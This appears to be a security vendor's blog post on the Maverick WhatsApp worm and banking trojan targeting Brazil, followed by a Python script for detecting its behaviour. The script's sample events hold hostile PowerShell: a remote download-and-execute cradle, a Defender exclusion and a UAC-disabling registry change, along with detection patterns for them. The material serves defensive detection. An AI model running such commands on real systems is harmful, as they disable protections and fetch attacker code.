[Infographic: WhatsApp chat with a malicious ZIP exploding into worm icons that spread to contacts; Selenium browser hijack and the Maverick trojan stealing bank data; a map of Brazil with 400+ infection pins; a protective antivirus shield captioned "Stop the Spread"]

Sophos analysts have uncovered Maverick Menace, a sophisticated self-propagating worm that abuses WhatsApp to attack Brazilian financial institutions and crypto exchanges. Launched September 29, 2025, it has infected over 400 customer environments and 1,000+ endpoints. The campaign relies on social engineering: compromised contacts send ZIP archives claiming the content is "desktop-only," tricking users into executing a malicious LNK file that runs Base64-encoded PowerShell to fetch payloads from C2 servers such as zapgrande[.]com.


The multi-stage infection evades defenses by using obfuscated scripts to modify Microsoft Defender exclusions and disable UAC. A first-stage process launched through Explorer downloads the core malware and establishes persistence. The result is a permissive environment for long-term access; the chain targets desktop Windows installs rather than mobile devices.


The dual payloads amplify the damage:

- Selenium automates the browser to hijack WhatsApp Web sessions and spread the ZIP to the victim's contacts automatically.
- The Maverick trojan monitors traffic for bank and crypto-exchange sites and injects .NET malware to steal credentials and siphon funds.

This tactic highlights the operators' Windows and banking expertise. Users should verify attachments before opening them, enable 2FA, and run antivirus with behavioral detection to counter it.
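As an added illustration (not part of the original article or of Sophos's analysis) of how a defender could spot the behaviours described above in process-creation telemetry: the script below decodes PowerShell `-EncodedCommand` arguments from sample command lines and flags download cradles, Defender exclusion changes, UAC registry tampering and hidden-window launches. The log records, PIDs and URL are constructed for the demo, and the indicator patterns are assumptions of this example, not Sophos detection logic.

```python
import base64
import re

# Constructed sample process-creation records (not from the page or from Sophos).
# The encoded payloads are harmless strings built below so the demo runs offline.
def _enc(ps: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # Download cradle launched with a hidden window (resembles the LNK-stage behaviour).
    {"pid": 4101, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage')")},
    # Defender exclusion plus UAC tampering via the EnableLUA policy value.
    {"pid": 4102, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -EncodedCommand "
                + _enc("Add-MpPreference -ExclusionPath $env:USERPROFILE; "
                       "Set-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System "
                       "-Name EnableLUA -Value 0")},
    # Benign scheduled script: should produce no indicators.
    {"pid": 4103, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common spellings.
ENCODED_FLAG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Indicator patterns (assumed for this example). Each is run over the decoded script body.
INDICATORS = [
    ("download_cradle",
     re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer")),
    ("defender_exclusion",
     re.compile(r"(?i)Add-MpPreference\s+-Exclusion|Set-MpPreference\s+-Disable")),
    ("uac_tamper",
     re.compile(r"(?i)EnableLUA|ConsentPromptBehaviorAdmin")),
]
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")


def decode_encoded_command(cmdline: str):
    """Return the decoded script from an -EncodedCommand argument, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (ValueError, base64.binascii.Error):
        return None
    return raw.decode("utf-16-le", errors="replace")


def classify(event: dict) -> list:
    """List the indicator names that fire for one process-creation event."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    found = []
    if decoded is not None:
        found.append("encoded_command")
    # Scan the decoded script when present, otherwise the plain command line.
    body = decoded if decoded is not None else cmdline
    for name, pattern in INDICATORS:
        if pattern.search(body):
            found.append(name)
    if HIDDEN_WINDOW.search(cmdline):
        found.append("hidden_window")
    return found


def triage(events: list) -> list:
    """Return only the events that raised indicators, with the indicator list attached."""
    hits = []
    for ev in events:
        indicators = classify(ev)
        if indicators:
            hits.append({"pid": ev["pid"], "parent": ev["parent"],
                         "indicators": indicators, "decoded": decode_encoded_command(ev["cmdline"])})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["pid"], hit["parent"], ", ".join(hit["indicators"]))
        print("   ", hit["decoded"])
```

In practice the event source would be Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled; the decoded script body, rather than the opaque Base64 blob, is what a detection rule should match on, since the raw encoding defeats simple string matching on `DownloadString` or `EnableLUA`.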


NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, FraudProtector.net